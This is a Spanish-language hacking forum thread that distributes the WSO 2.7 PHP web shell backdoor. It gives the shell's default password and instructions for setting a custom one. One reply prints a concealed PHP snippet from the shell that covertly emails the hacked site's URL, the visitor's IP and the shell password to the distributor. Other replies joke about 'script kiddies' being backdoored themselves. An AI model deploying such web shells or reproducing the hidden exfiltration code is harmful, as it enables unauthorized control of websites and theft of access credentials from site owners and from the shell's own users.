[PHP] WSO shell backdoor

  • 3 Respuestas
  • 6739 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado craventhegod

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • [C]raven [in]seguridad Informatica

[PHP] WSO shell backdoor

  • en: Mayo 12, 2013, 02:46:46 pm
WSO es una php shell backdoor  que proporciona una interfaz para distintas operaciones remotas,  ahora en su version 2.7 con nuevas herramientas y un vistoso cambio en imagen.



con pass simple                  You are not allowed to view links. Register or Login

pass con error 404                 You are not allowed to view links. Register or Login



importante cambiar la contraseña de la shell***



1. Abriremos nuestra shell en un editor de texto plano (yo les recomiendo notepad)

2. buscaremos

$auth_pass = “1846c8d1ead7d12e9f4d18db001ff079″;

 

lo remplazaremos por nuestra contraseña en MD5 y guardamos

ya que si no quieren cambiar la pass.
 la contraseña por defecto es:

hackmeDON


todo es relativo, hasta nuestra existencia :) Shalom

Desconectado S t Ø r M d ∆ r k

  • *
  • Underc0der
  • Mensajes: 73
  • Actividad:
    0%
  • Reputación 0
  • fb.com/cyberoxyde
  • Twitter: @stormdark_
    • Ver Perfil
    • Mi Blog
    • Email

Re:[PHP] WSO shell backdoor

  • en: Mayo 12, 2013, 03:05:58 pm
Hay que enseñarles a ofuscar código a estos juakerz

Código: You are not allowed to view links. Register or Login
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
You are not allowed to view links. Register or Login
In my mind where before there was order, today there is only chaØs!

Desconectado TUNOVATO

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:[PHP] WSO shell backdoor

  • en: Julio 26, 2013, 11:37:31 pm
You are not allowed to view links. Register or Login
Hay que enseñarles a ofuscar código a estos juakerz

Código: You are not allowed to view links. Register or Login
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);

este es un descarado...... ----> [email protected]

 ;D ;D ;D ;D ;D

Desconectado Psymera

  • *
  • Underc0der
  • Mensajes: 75
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[PHP] WSO shell backdoor

  • en: Julio 29, 2013, 10:13:33 am
eso pasa por ocupar herramientas de otros o lo que es lo mismo ser un simple kiddie xD
El conocimiento es libre...
La información no lo es xD